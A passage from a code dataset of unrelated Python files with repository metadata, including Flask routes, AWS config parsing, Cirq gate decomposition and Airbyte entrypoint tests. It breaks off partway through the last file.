:',(time.time()-i2c_time)*1000)\n # print(is_tracking)\n if cv.waitKey(10) & 0xFF == 27 :\n stream.stop()\n pdetect.stop()\n detect.stop()\n break\nGPIO.cleanup()\ncv.destroyAllWindows()","repo_name":"kevinjacb/computer_vision_drone","sub_path":"fcCode.py","file_name":"fcCode.py","file_ext":"py","file_size_in_byte":15676,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"4218743940","text":"\"\"\"Courseware constants\"\"\"\n\nPLATFORM_EDX = \"edx\"\n# List of all currently-supported openedx platforms\nOPENEDX_PLATFORMS = (PLATFORM_EDX,)\n# Currently-supported openedx platforms in a ChoiceField-friendly format\nOPENEDX_PLATFORM_CHOICES = zip(OPENEDX_PLATFORMS, OPENEDX_PLATFORMS)\nEDX_ENROLLMENT_VERIFIED_MODE = \"verified\"\nEDX_ENROLLMENT_AUDIT_MODE = \"audit\"\nEDX_DEFAULT_ENROLLMENT_MODE = EDX_ENROLLMENT_AUDIT_MODE\nEDX_ENROLLMENTS_PAID_MODES = [\n EDX_ENROLLMENT_VERIFIED_MODE,\n]\nPRO_ENROLL_MODE_ERROR_TEXTS = (\n \"The [{}] course mode is expired or otherwise unavailable for course run\".format(\n EDX_DEFAULT_ENROLLMENT_MODE\n ),\n \"Specified course mode '{}' unavailable for course\".format(\n EDX_DEFAULT_ENROLLMENT_MODE\n ),\n)\n# The amount of minutes after creation that a openedx model record should be eligible for repair\nOPENEDX_REPAIR_GRACE_PERIOD_MINS = 5\n","repo_name":"mitodl/mitxonline","sub_path":"openedx/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"}
+{"seq_id":"38825892415","text":"from application import app, db\nfrom application.models import Review, Film\nfrom flask import render_template, url_for\nfrom flask import redirect, request\nfrom application.forms import AddReview, AddFilm\n\n\n@app.route('/', methods=['GET','POST'])\n\n@app.route('/home', methods=['GET','POST'])\ndef home():\n all_reviews = Review.query.all()\n all_film = Film.query.all()\n print(all_reviews)\n return render_template('home.html', title=\"Home\", all_reviews=all_reviews, all_film=all_film)\n\n@app.route('/addfilm', methods=['GET', 'POST'])\ndef addfilm():\n form = AddFilm()\n if request.method == 'POST':\n if form.validate_on_submit():\n new_film = Film(\n title = form.title.data,\n description = form.description.data,\n released_at = form.released_at.data,\n age_rating = form.age_rating.data\n )\n\n db.session.add(new_film)\n db.session.commit()\n return redirect(url_for(\"home\"))\n return render_template('addfilm.html', title=\"Add a Film\", form=form)\n\n\n@app.route('/addreview', methods=['GET','POST'])\ndef addreview():\n form = AddReview()\n form.film_title.choices = [(film.id, film.title) for film in Film.query.all()]\n if request.method == 'POST':\n if form.validate_on_submit():\n new_review = Review(\n film_id = form.film_title.data,\n author = form.author.data,\n review = form.review.data,\n rating = form.rating.data\n )\n\n db.session.add(new_review)\n db.session.commit()\n return redirect(url_for(\"home\"))\n return render_template('add_review.html', title='Add a Review', form=form)\n\n@app.route(\"/update/\", methods=[\"GET\", \"POST\"])\ndef update(id):\n form = AddReview()\n form.film_title.choices = [(title.title) for title in Film.query.all()]\n review = Review.query.filter_by(id=id).first()\n if request.method == \"POST\":\n review.film_title = form.film_title.data\n review.author = form.author.data\n review.review = form.review.data\n review.rating = form.rating.data\n db.session.commit()\n return redirect(url_for(\"home\"))\n\n return render_template(\"update.html\", form=form, title=\"Update Review\", review=review)\n\n@app.route(\"/updatefilm/\", methods=[\"GET\", \"POST\"])\ndef updatefilm(id):\n form = AddFilm()\n film = Film.query.filter_by(id=id).first()\n if request.method == \"POST\":\n film.title = form.title.data\n film.decription = form.description.data\n film.released_at = form.released_at.data\n film.age_rating = form.age_rating.data\n db.session.commit()\n return redirect(url_for(\"home\"))\n\n return render_template(\"updatefilm.html\", form=form, title=\"Update Film\", film=film)\n\n@app.route('/deletereview/', methods=[\"GET\", \"POST\"])\ndef deletereview(id):\n reviewtodelete = Review.query.get(id)\n db.session.delete(reviewtodelete)\n db.session.commit()\n return redirect(url_for('home'))\n\n@app.route('/deletefilm/', methods=[\"GET\", \"POST\"])\ndef deletefilm(id):\n filmtodelete = Film.query.get(id)\n db.session.delete(filmtodelete)\n db.session.commit()\n return redirect(url_for('home'))\n\n@app.route('/filmlist', methods=['GET','POST'])\ndef filmlist():\n all_films = Film.query.all()\n print(all_films)\n return render_template(\"filmlist.html\", title=\"Film List\", all_films=all_films)\n\n@app.route('/count', methods=[\"GET\", \"POST\"])\ndef count():\n number_of_reviews = Review.query.count()\n print(number_of_reviews)\n db.session.commit()\n return render_template(\"count.html\", title=\"Count\", number_of_reviews=number_of_reviews)","repo_name":"sc18kg/first-qa-project","sub_path":"application/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"26149845883","text":"import pandas as pd\nimport os\nfrom shutil import copyfile\n\nFePh_base_path = \"/Users/chbh01/Documents/OfflineCodebases/DFKI_Hiwi/ACG/EASIER/Datasets/FePh/\"\ny_df = pd.read_csv(os.path.join(FePh_base_path, \"FePh_labels.csv\"))\nimages_dir = os.path.join(FePh_base_path, \"FePh_images\")\n\ndestination_folder = \"FePh_images-single-labels-only\"\nos.makedirs(os.path.join(FePh_base_path, destination_folder))\ny_df.dropna(inplace=True)\n# Extracting multiple labels\ny_df['Facial_label'] = y_df['Facial_label'].apply(lambda x: [int(i) for i in x])\ny_df['num_labels'] = y_df['Facial_label'].apply(lambda x: len(x))\n# Removing all data points with more than one labels ==> Ambiguous\ny_df = y_df[y_df[\"num_labels\"] == 1]\ny_df['Facial_label'] = y_df['Facial_label'].apply(lambda x: x[0]).to_numpy()\nprint(y_df[\"External ID\"].values.shape)\n\nfor f in y_df[\"External ID\"]:\n try:\n copyfile(os.path.join(images_dir, f), os.path.join(FePh_base_path, destination_folder, f))\n except FileNotFoundError:\n copyfile(os.path.join(images_dir, f + \".png\"), os.path.join(FePh_base_path, destination_folder, f + \".png\"))\n\ny_df.to_csv(\"FePh_labels_single_label_only.csv\")\n","repo_name":"DFKI-SignLanguage/EASIER-EkmanClassifier","sub_path":"Scripts/gen_FePh_fullset_onlysinglelabels.py","file_name":"gen_FePh_fullset_onlysinglelabels.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"8022296312","text":"from tkinter import TRUE\r\nimport operator\r\n\r\ndef sort_by_occurrence(nums):\r\n \"\"\"按照 list 物件 nums 里的各元素出现次数,进行递增排序\"\"\"\r\n # 把你的程式码放在这里\r\n a = {} \r\n for i in input_list:\r\n if input_list.count(i)>0:\r\n a[i]= input_list.count(i) #出现次数\r\n a = sorted(a.items(),key=operator.itemgetter(1)) #排序\r\n res = []\r\n for item in a:\r\n res.append(item[0])\r\n return res\r\n\r\nif __name__ == '__main__':\r\n # 只有当这个 py 档案以 Python 直译器执行时,才会执行到以下程式码。\r\n # 若是把这个 py 档案做为模组来汇入,不会执行到以下程式码。\r\n input_list = [7,7,7,8,1,1]\r\n output_list = sort_by_occurrence(input_list)\r\n print(output_list)\r\n\r\n\r\n#留言板","repo_name":"EEB113A/hw3-Code-Review","sub_path":"1070327_王云晨.py","file_name":"1070327_王云晨.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"5641923378","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\n\nfrom flask import json\nfrom six import BytesIO\n\nfrom swagger_server.models.cid import Cid # noqa: E501\nfrom swagger_server.models.componentsresponses_not_foundcontentapplication1problem2_bxmlschema import ComponentsresponsesNotFoundcontentapplication1problem2Bxmlschema # noqa: E501\nfrom swagger_server.models.create_cid_set_file_request import CreateCidSetFileRequest # noqa: E501\nfrom swagger_server.models.create_cid_set_file_response import CreateCidSetFileResponse # noqa: E501\nfrom swagger_server.models.create_sync_verification_request import CreateSyncVerificationRequest # noqa: E501\nfrom swagger_server.models.create_sync_verification_response import CreateSyncVerificationResponse # noqa: E501\nfrom swagger_server.models.get_cid_set_file_response import GetCidSetFileResponse # noqa: E501\nfrom swagger_server.models.get_entry_by_cid_response import GetEntryByCidResponse # noqa: E501\nfrom swagger_server.models.inline_response404 import InlineResponse404 # noqa: E501\nfrom swagger_server.models.key_type import KeyType # noqa: E501\nfrom swagger_server.models.list_cid_set_events_response import ListCidSetEventsResponse # noqa: E501\nfrom swagger_server.test import BaseTestCase\n\n\nclass TestReconciliationController(BaseTestCase):\n \"\"\"ReconciliationController integration test stubs\"\"\"\n\n def test_create_cid_set_file(self):\n \"\"\"Test case for create_cid_set_file\n\n Criar Arquivo de CIDs\n \"\"\"\n body = CreateCidSetFileRequest()\n response = self.client.open(\n '/api/v1-rc5//cids/files/',\n method='POST',\n data=json.dumps(body),\n content_type='application/xml')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))\n\n def test_create_sync_verification(self):\n \"\"\"Test case for create_sync_verification\n\n Verificar Sincronismo\n \"\"\"\n body = CreateSyncVerificationRequest()\n response = self.client.open(\n '/api/v1-rc5//sync-verifications/',\n method='POST',\n data=json.dumps(body),\n content_type='application/xml')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))\n\n def test_get_cid_set_file(self):\n \"\"\"Test case for get_cid_set_file\n\n Consultar Arquivo de CIDs\n \"\"\"\n headers = [('pi_requesting_participant', 'pi_requesting_participant_example')]\n response = self.client.open(\n '/api/v1-rc5//cids/files/{Id}'.format(id=56),\n method='GET',\n headers=headers)\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))\n\n def test_get_entry_by_cid(self):\n \"\"\"Test case for get_entry_by_cid\n\n Consultar Vínculo por CID\n \"\"\"\n response = self.client.open(\n '/api/v1-rc5//cids/entries/{Cid}'.format(cid=Cid()),\n method='GET')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))\n\n def test_list_cid_set_events(self):\n \"\"\"Test case for list_cid_set_events\n\n Listar Eventos de CIDs\n \"\"\"\n query_string = [('participant', 'participant_example'),\n ('key_type', KeyType()),\n ('start_time', '2013-10-20T19:20:30+01:00'),\n ('end_time', '2013-10-20T19:20:30+01:00'),\n ('limit', 56)]\n response = self.client.open(\n '/api/v1-rc5//cids/events',\n method='GET',\n query_string=query_string)\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))\n\n\nif __name__ == '__main__':\n import unittest\n unittest.main()\n","repo_name":"legiti/pix-dict-api","sub_path":"flask/swagger_server/test/test_reconciliation_controller.py","file_name":"test_reconciliation_controller.py","file_ext":"py","file_size_in_byte":3901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"}
+{"seq_id":"10029945564","text":"import configparser\n\n\nclass AWSIdentity:\n def __init__(self, config_file_path):\n \"\"\"\n Get AWS KEY, SECRET, and TOKEN in config file\n :param config_file_path: Path lead to AWS credential config file\n \"\"\"\n self.config = configparser.ConfigParser()\n self.config.read_file(open(config_file_path))\n self.aws_identity = dict()\n\n self.__get_aws_identity()\n\n def __get_aws_identity(self):\n self.aws_identity['aws_key'] = self.config.get('AWS', 'KEY')\n self.aws_identity['aws_secret'] = self.config.get('AWS', 'SECRET')\n self.aws_identity['aws_token'] = self.config.get('AWS', 'TOKEN')\n\n\nclass AWSCluster:\n def __init__(self, config_file_path):\n \"\"\"\n Get all required info for AWS S3, Redshift Cluster, and Database in config file\n :param config_file_path: Path lead to AWS S3, Redshift Cluster, and Database config file\n \"\"\"\n self.config = configparser.ConfigParser()\n self.config.read_file(open(config_file_path))\n self.cluster_info = dict()\n\n self.__get_cluster_info()\n\n def __get_cluster_info(self):\n # Cluster configuration\n self.cluster_info['dwh_cluster_identifier'] = self.config.get(\"DWH\", \"CLUSTER_IDENTIFIER\")\n self.cluster_info['dwh_cluster_type'] = self.config.get(\"DWH\", \"CLUSTER_TYPE\")\n self.cluster_info['dwh_num_nodes'] = self.config.get(\"DWH\", \"NUM_NODES\")\n self.cluster_info['dwh_node_type'] = self.config.get(\"DWH\", \"NODE_TYPE\")\n\n # Database info\n self.cluster_info['dwh_db'] = self.config.get(\"CLUSTER\", \"DB_NAME\")\n self.cluster_info['dwh_db_user'] = self.config.get(\"CLUSTER\", \"DB_USER\")\n self.cluster_info['dwh_db_password'] = self.config.get(\"CLUSTER\", \"DB_PASSWORD\")\n self.cluster_info['dwh_port'] = self.config.get(\"CLUSTER\", \"DB_PORT\")\n self.cluster_info['dwh_host'] = self.config.get(\"CLUSTER\", \"HOST\")\n self.cluster_info['dwh_region'] = self.config.get(\"DWH\", \"REGION\")\n\n # S3 info\n self.cluster_info['s3_log_data'] = self.config.get('S3', 'log_data')\n self.cluster_info['s3_log_jsonpath'] = self.config.get('S3', 'log_jsonpath')\n self.cluster_info['s3_song_data'] = self.config.get('S3', 'song_data')\n\n # IAM role\n self.cluster_info['dwh_iam_role_name'] = self.config.get(\"DWH\", \"IAM_ROLE_NAME\")\n self.cluster_info['dwh_iam_arn'] = self.config.get(\"IAM_ROLE\", \"ARN\")\n\n","repo_name":"xzbits/project3_DE_ND","sub_path":"aws_identity_redshift_cluster_config.py","file_name":"aws_identity_redshift_cluster_config.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"20837569319","text":"# Напишите программу, которая по заданному номеру четверти \n# показывает диапазон возможных координат точек в этой четверти (x и y).\n\n# print('Введите номер четверти')\n# n = int(input())\n# if n == 1:\n# print('x = (0; +∞) y = (0; +∞)')\n# elif n == 2:\n# print('x = (0; +∞) y = (-∞; 0)')\n# elif n == 3:\n# print('x = (-∞; 0) y = (-∞; 0)')\n# elif n == 4:\n# print('x = (-∞; 0) y = (0; +∞)')\n\nnumber = int(input()) # на строку ниже создаем словарь по ключу\nd = {1: 'x = (0; +∞) y = (0; +∞)', 2: 'x = (0; +∞) y = (-∞; 0)', 3: 'x = (-∞; 0) y = (-∞; 0)', 4: 'x = (-∞; 0) y = (0; +∞)'}\nprint(d[number])","repo_name":"IljaBoroznov/pithon_homework","sub_path":"Homework_1/Task_3.py","file_name":"Task_3.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"21908624978","text":"from typing import List, Tuple\n\nimport numpy as np\nimport cirq\nfrom cirq import optimizers\n\n\ndef matrix_to_sycamore_operations(\n target_qubits: List[cirq.GridQubit], matrix: np.ndarray\n) -> Tuple[cirq.OP_TREE, List[cirq.GridQubit]]:\n \"\"\"A method to convert a unitary matrix to a list of Sycamore operations.\n\n This method will return a list of `cirq.Operation`s using the qubits and (optionally) ancilla\n qubits to implement the unitary matrix `matrix` on the target qubits `qubits`.\n The operations are also supported by `cirq.google.gate_sets.SYC_GATESET`.\n\n Args:\n target_qubits: list of qubits the returned operations will act on. The qubit order defined by the list\n is assumed to be used by the operations to implement `matrix`.\n matrix: a matrix that is guaranteed to be unitary and of size (2**len(qs), 2**len(qs)).\n Returns:\n A tuple of operations and ancilla qubits allocated.\n Operations: In case the matrix is supported, a list of operations `ops` is returned.\n `ops` acts on `qs` qubits and for which `cirq.unitary(ops)` is equal to `matrix` up\n to certain tolerance. In case the matrix is not supported, it might return NotImplemented to\n reduce the noise in the judge output.\n Ancilla qubits: In case ancilla qubits are allocated a list of ancilla qubits. Otherwise\n an empty list.\n .\n \"\"\"\n num_of_qubits = len(target_qubits)\n\n if np.all(np.equal(matrix, np.eye(2 ** num_of_qubits))):\n # Simple Identity Check\n ops_list = []\n for qubit in target_qubits:\n op = cirq.Z(qubit) ** 0\n cirq.google.Sycamore.validate_operation(op)\n ops_list.append(cirq.Z(qubit) ** 0)\n return ops_list, []\n\n if num_of_qubits == 1:\n # single qubit gates\n gate = optimizers.single_qubit_matrix_to_phxz(matrix)\n cirq.google.Sycamore.validate_operation(gate(target_qubits[0]))\n return [gate(target_qubits[0])], []\n\n elif num_of_qubits == 2:\n # two qubit gates\n ops_list = optimizers.two_qubit_matrix_to_operations(target_qubits[0], target_qubits[1], matrix,\n allow_partial_czs=True)\n ConvertToSycamoreGates = cirq.google.ConvertToSycamoreGates()\n converted_ops_list = ConvertToSycamoreGates.convert(op=ops_list)\n return converted_ops_list, []\n\n elif is_incremental(matrix):\n ancilla = find_neighbor_available_qubit(target_qubits)\n return decompose_incrementer_matrix(target_qubits, ancilla), [ancilla]\n\n elif num_of_qubits == 3:\n # three qubit gates\n ops_list = optimizers.three_qubit_matrix_to_operations(target_qubits[0], target_qubits[1], target_qubits[2],\n matrix)\n\n return ops_list, []\n\n elif np.count_nonzero(matrix - np.diag(np.diagonal(matrix))) == 0:\n # diagonal gates with more than 3 qubits\n angle_list = []\n for i in np.arange(np.shape(matrix)[0]):\n angle_list.append(np.angle(matrix[i, i]))\n diagonal_gate = cirq.ops.DiagonalGate(angle_list)\n ops_list = diagonal_gate._decompose_(qubits=target_qubits)\n\n return ops_list, []\n\n elif num_of_qubits == 4:\n ancilla = find_neighbor_available_qubit(target_qubits)\n CTOFFLI_mat = cirq.unitary(\n cirq.ops.ControlledOperation(controls=[target_qubits[0], target_qubits[1], target_qubits[2]],\n sub_operation=cirq.X(target_qubits[3])))\n if np.all(np.equal(matrix, CTOFFLI_mat)):\n ops_list = []\n ConvertToSycamoreGates = cirq.google.ConvertToSycamoreGates()\n decomposed_ops = cirq.optimizers.decompose_multi_controlled_x(\n controls=[target_qubits[2], target_qubits[1], target_qubits[0]], target=target_qubits[3],\n free_qubits=[ancilla])\n ops_list.append(ConvertToSycamoreGates.convert(decomposed_ops))\n return ops_list, [ancilla]\n\n\n else:\n ops_list = []\n for qubit in target_qubits:\n op = cirq.Z(qubit) ** 0\n cirq.google.Sycamore.validate_operation(op)\n ops_list.append(cirq.Z(qubit) ** 0)\n return ops_list, []\n\ndef is_incremental(mat):\n mat_new = np.zeros([np.shape(mat)[0], np.shape(mat)[1]])\n mat_new[0:-1, :] = mat[1:, :]\n mat_new[-1, :] = mat[0, :]\n\n return np.count_nonzero(mat_new - np.diag(np.diagonal(mat_new))) == 0\n\n\ndef decompose_incrementer_matrix(target_qubits, ancilla):\n ConvertToSycamoreGates = cirq.google.ConvertToSycamoreGates()\n num_of_qubits = len(target_qubits)\n # assume num_of_qubits>=3\n q = target_qubits[::-1]\n op_list = []\n\n if num_of_qubits > 7:\n decomposed_ops = cirq.optimizers.decompose_multi_controlled_x(\n controls=[q[0], q[1], q[2], q[3], q[4], q[5], q[6]],\n target=q[7], free_qubits=[ancilla])\n op_list.append(ConvertToSycamoreGates.convert(decomposed_ops))\n\n if num_of_qubits > 6:\n decomposed_ops = cirq.optimizers.decompose_multi_controlled_x(controls=[q[0], q[1], q[2], q[3], q[4], q[5]],\n target=q[6], free_qubits=[ancilla])\n op_list.append(ConvertToSycamoreGates.convert(decomposed_ops))\n\n if num_of_qubits > 5:\n decomposed_ops = cirq.optimizers.decompose_multi_controlled_x(controls=[q[0], q[1], q[2], q[3], q[4]],\n target=q[5],\n free_qubits=[ancilla])\n op_list.append(ConvertToSycamoreGates.convert(decomposed_ops))\n\n if num_of_qubits > 4:\n decomposed_ops = cirq.optimizers.decompose_multi_controlled_x(controls=[q[0], q[1], q[2], q[3]], target=q[4],\n free_qubits=[ancilla])\n op_list.append(ConvertToSycamoreGates.convert(decomposed_ops))\n\n if num_of_qubits > 3:\n decomposed_ops = cirq.optimizers.decompose_multi_controlled_x(controls=[q[0], q[1], q[2]], target=q[3],\n free_qubits=[ancilla])\n op_list.append(ConvertToSycamoreGates.convert(decomposed_ops))\n op_list.append(ConvertToSycamoreGates.convert(op=cirq.TOFFOLI(q[0], q[1], q[2])))\n\n op_list.append(ConvertToSycamoreGates.convert(op=cirq.CNOT(q[0], q[1])))\n\n op_list.append(cirq.X(q[0]))\n\n return op_list\n\ndef find_neighbor_available_qubit(target_qubits):\n for target_qubit in target_qubits:\n neighbor_qubits = target_qubit.neighbors()\n for neighbor_qubit in neighbor_qubits:\n if neighbor_qubit not in target_qubits:\n return neighbor_qubit\n\n","repo_name":"ziweiqiu/qchack-2021-challenge","sub_path":"solution/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":6934,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"}
+{"seq_id":"20187226731","text":"import os\nfrom argparse import Namespace\nfrom copy import deepcopy\nfrom typing import Any, List, Mapping, MutableMapping, Union\nfrom unittest import mock\nfrom unittest.mock import MagicMock, patch\n\nimport pytest\nimport requests\nfrom airbyte_cdk import AirbyteEntrypoint\nfrom airbyte_cdk import entrypoint as entrypoint_module\nfrom airbyte_cdk.models import (\n AirbyteCatalog,\n AirbyteConnectionStatus,\n AirbyteControlConnectorConfigMessage,\n AirbyteControlMessage,\n AirbyteMessage,\n AirbyteRecordMessage,\n AirbyteStream,\n ConnectorSpecification,\n OrchestratorType,\n Status,\n SyncMode,\n Type,\n)\nfrom airbyte_cdk.sources import Source\n\n\nclass MockSource(Source):\n def read(self, **kwargs):\n pass\n\n def discover(self, **kwargs):\n pass\n\n def check(self, **kwargs):\n pass\n\n @property\n def message_repository(self):\n pass\n\n\ndef _as_arglist(cmd: str, named_args: Mapping[str, Any]) -> List[str]:\n out = [cmd]\n for k, v in named_args.items():\n out.append(f\"--{k}\")\n if v:\n out.append(v)\n return out\n\n\n@pytest.fixture\ndef spec_mock(mocker):\n expected = ConnectorSpecification(connectionSpecification={})\n mock = MagicMock(return_value=expected)\n mocker.patch.object(MockSource, \"spec\", mock)\n return mock\n\n\nMESSAGE_FROM_REPOSITORY = AirbyteMessage(\n type=Type.CONTROL,\n control=AirbyteControlMessage(\n type=OrchestratorType.CONNECTOR_CONFIG,\n emitted_at=10,\n connectorConfig=AirbyteControlConnectorConfigMessage(config={\"any config\": \"a config value\"}),\n ),\n)\n\n\n@pytest.fixture\ndef entrypoint(mocker) -> AirbyteEntrypoint:\n message_repository = MagicMock()\n message_repository.consume_queue.side_effect = [[message for message in [MESSAGE_FROM_REPOSITORY]], []]\n mocker.patch.object(MockSource, \"message_repository\", new_callable=mocker.PropertyMock, return_value=message_repository)\n return AirbyteEntrypoint(MockSource())\n\n\ndef test_airbyte_entrypoint_init(mocker):\n mocker.patch.object(entrypoint_module, \"init_uncaught_exception_handler\")\n AirbyteEntrypoint(MockSource())\n entrypoint_module.init_uncaught_exception_handler.assert_called_once_with(entrypoint_module.logger)\n\n\n@pytest.mark.parametrize(\n [\"cmd\", \"args\", \"expected_args\"],\n [\n (\"spec\", {\"debug\": \"\"}, {\"command\": \"spec\", \"debug\": True}),\n (\"check\", {\"config\": \"config_path\"}, {\"command\": \"check\", \"config\": \"config_path\", \"debug\": False}),\n (\"discover\", {\"config\": \"config_path\", \"debug\": \"\"}, {\"command\": \"discover\", \"config\": \"config_path\", \"debug\": True}),\n (\n \"read\",\n {\"config\": \"config_path\", \"catalog\": \"catalog_path\", \"state\": \"None\"},\n {\"command\": \"read\", \"config\": \"config_path\", \"catalog\": \"catalog_path\", \"state\": \"None\", \"debug\": False},\n ),\n (\n \"read\",\n {\"config\": \"config_path\", \"catalog\": \"catalog_path\", \"state\": \"state_path\", \"debug\": \"\"},\n {\"command\": \"read\", \"config\": \"config_path\", \"catalog\": \"catalog_path\", \"state\": \"state_path\", \"debug\": True},\n ),\n ],\n)\ndef test_parse_valid_args(cmd: str, args: Mapping[str, Any], expected_args, entrypoint: AirbyteEntrypoint):\n arglist = _as_arglist(cmd, args)\n parsed_args = entrypoint.parse_args(arglist)\n assert vars(parsed_args) == expected_args\n\n\n@pytest.mark.parametrize(\n [\"cmd\", \"args\"],\n [\n (\"check\", {\"config\": \"config_path\"}),\n (\"discover\", {\"config\": \"config_path\"}),\n (\"read\", {\"config\": \"config_path\", \"catalog\": \"catalog_path\"}),\n ],\n)\ndef test_parse_missing_required_args(cmd: str, args: MutableMapping[str, Any], entrypoint: AirbyteEntrypoint):\n required_args = {\"check\": [\"config\"], \"discover\": [\"config\"], \"read\": [\"config\", \"catalog\"]}\n for required_arg in required_args[cmd]:\n argcopy = deepcopy(args)\n del argcopy[required_arg]\n with pytest.raises(BaseException):\n entrypoint.parse_args(_as_arglist(cmd, argcopy))\n\n\ndef _wrap_message(submessage: Union[AirbyteConnectionStatus, ConnectorSpecification, AirbyteRecordMessage, AirbyteCatalog]) -> str:\n if isinstance(submessage, AirbyteConnectionStatus):\n message = AirbyteMessage(type=Type.CONNECTION_STATUS, connectionStatus=submessage)\n elif isinstance(submessage, ConnectorSpecification):\n message = AirbyteMessage(type=Type.SPEC, spec=submessage)\n elif isinstance(submessage, AirbyteCatalog):\n message = AirbyteMessage(type=Type.CATALOG, catalog=submessage)\n elif isinstance(submessage, AirbyteRecordMessage):\n message = AirbyteMessage(type=Type.RECORD, record=submessage)\n else:\n raise Exception(f\"Unknown message type: {submessage}\")\n\n return message.json(exclude_unset=True)\n\n\ndef test_run_spec(entrypoint: AirbyteEntrypoint, mocker):\n parsed_args = Namespace(command=\"spec\")\n expected = ConnectorSpecification(connectionSpecification={\"hi\": \"hi\"})\n mocker.patch.object(MockSource, \"spec\", return_value=expected)\n\n messages = list(entrypoint.run(parsed_args))\n\n assert [MESSAGE_FROM_REPOSITORY.json(exclude_unset=True), _wrap_message(expected)] == messages\n\n\n@pytest.fixture\ndef config_mock(mocker, request):\n config = request.param if hasattr(request, \"param\") else {\"username\": \"fake\"}\n mocker.patch.object(MockSource, \"read_config\", return_value=config)\n mocker.patch.object(MockSource, \"configure\", return_value=config)\n return config\n\n\n@pytest.mark.parametrize(\n \"config_mock, schema, config_valid\",\n [\n ({\"username\": \"fake\"}, {\"type\": \"object\", \"properties\": {\"name\": {\"type\": \"string\"}}, \"additionalProperties\": False}, False),\n ({\"username\": \"fake\"}, {\"type\": \"object\", \"properties\": {\"username\": {\"type\": \"string\"}}, \"additionalProperties\": False}, True),\n ({\"username\": \"fake\"}, {\"type\": \"object\", \"properties\": {\"user\": {\"type\": \"string\"}}}, True),\n ({\"username\": \"fake\"}, {\"type\": \"object\", \"properties\": {\"user\": {\"type\": \"string\", \"airbyte_secret\": True}}}, True),\n (\n {\"username\": \"fake\", \"_limit\": 22},\n {\"type\": \"object\", \"properties\": {\"username\": {\"type\": \"string\"}}, \"additionalProperties\": False},\n True,\n ),\n ],\n indirect=[\"config_mock\"],\n)\ndef test_config_validate(entrypoint: AirbyteEntrypoint, mocker, config_mock, schema, config_valid):\n parsed_args = Namespace(command=\"check\", config=\"config_path\")\n check_value = AirbyteConnectionStatus(status=Status.SUCCEEDED)\n mocker.patch.object(MockSource, \"check\", return_value=check_value)\n mocker.patch.object(MockSource, \"spec\", return_value=ConnectorSpecification(connectionSpecification=schema))\n\n messages = list(entrypoint.run(parsed_args))\n if config_valid:\n assert [MESSAGE_FROM_REPOSITORY.json(exclude_unset=True), _wrap_message(check_value)] == messages\n else:\n assert len(messages) == 2\n assert messages[0] == MESSAGE_FROM_REPOSITORY.json(exclude_unset=True)\n connection_status_message = AirbyteMessage.parse_raw(messages[1])\n assert connection_status_message.type == Type.CONNECTION_STATUS\n assert connection_status_message.connectionStatus.status == Status.FAILED\n assert connection_status_message.connectionStatus.message.startswith(\"Config validation error:\")\n\n\ndef test_run_check(entrypoint: AirbyteEntrypoint, mocker, spec_mock, config_mock):\n parsed_args = Namespace(command=\"check\", config=\"config_path\")\n check_value = AirbyteConnectionStatus(status=Status.SUCCEEDED)\n mocker.patch.object(MockSource, \"check\", return_value=check_value)\n\n messages = list(entrypoint.run(parsed_args))\n\n assert [MESSAGE_FROM_REPOSITORY.json(exclude_unset=True), _wrap_message(check_value)] == messages\n assert spec_mock.called\n\n\ndef test_run_check_with_exception(entrypoint: AirbyteEntrypoint, mocker, spec_mock, config_mock):\n parsed_args = Namespace(command=\"check\", config=\"config_path\")\n mocker.patch.object(MockSource, \"check\", side_effect=ValueError(\"Any error\"))\n\n with pytest.raises(ValueError):\n messages = list(entrypoint.run(parsed_args))\n assert [MESSAGE_FROM_REPOSITORY.json(exclude_unset=True)] == messages\n\n\ndef test_run_discover(entrypoint: AirbyteEntrypoint, mocker, spec_mock, config_mock):\n parsed_args = Namespace(command=\"discover\", config=\"config_path\")\n expected = AirbyteCatalog(streams=[AirbyteStream(name=\"stream\", json_schema={\"k\": \"v\"}, supported_sync_modes=[SyncMode.full_refresh])])\n mocker.patch.object(MockSource, \"discover\", return_value=expected)\n\n messages = list(entrypoint.run(parsed_args))\n\n assert [MESSAGE_FROM_REPOSITORY.json(exclude_unset=True), _wrap_message(expected)] == messages\n assert spec_mock.called\n\n\ndef test_run_discover_with_exception(entrypoint: AirbyteEntrypoint, mocker, spec_mock, config_mock):\n parsed_args = Namespace(command=\"discover\", config=\"config_path\")\n mocker.patch.object(MockSource, \"discover\", side_effect=ValueError(\"Any error\"))\n\n with pytest.raises(ValueError):\n messages = list(entrypoint.run(parsed_args))\n assert [MESSAGE_FROM_REPOSITORY.json(exclude_unset=True)] == messages\n\n\ndef test_run_read(entrypoint: AirbyteEntrypoint, mocker, spec_mock, config_mock):\n parsed_args = Namespace(command=\"read\", config=\"config_path\", state=\"statepath\", catalog=\"catalogpath\")\n expected = AirbyteRecordMessage(stream=\"stream\", data={\"data\": \"stuff\"}, emitted_at=1)\n mocker.patch.object(MockSource, \"read_state\", return_value={})\n mocker.patch.object(MockSource, \"read_catalog\", return_value={})\n mocker.patch.object(MockSource, \"read\", return_value=[AirbyteMessage(record=expected, type=Type.RECORD)])\n\n messages = 